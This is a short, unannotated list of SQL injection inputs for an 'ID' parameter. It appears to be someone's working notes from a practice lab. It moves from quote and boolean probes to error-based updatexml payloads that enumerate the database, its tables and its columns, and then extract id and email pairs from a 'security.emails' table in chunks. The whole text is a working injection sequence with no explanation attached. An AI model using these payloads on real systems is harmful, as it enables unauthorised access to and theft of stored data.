ID:1
ID:1'
ID:1' 
ID:1
ID:1 and
ID:1 and 1=2
ID:1' and 1=2
ID:1' or1=2
ID:1\
ID:1'
ID:1'-
ID:1
ID:1' or 1 or '1
ID:1' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1
ID:1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or '1
ID:1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='emails'),0x7e),1) or '1
ID:1' or updatexml(1,concat(0x7e,(select group_concat(id,':',email_id) from security.emails),0x7e),1) or '1
ID:1' or updatexml(1,concat(0x7e,mid((select group_concat(id,':',email_id) from security.emails),15),0x7e),1) or '1
ID:1' or updatexml(1,concat(0x7e,mid((select group_concat(id,':',email_id) from security.emails),32),0x7e),1) or '1
ID:1' or updatexml(1,concat(0x7e,mid((select group_concat(id,':',email_id) from security.emails),60),0x7e),1) or '1
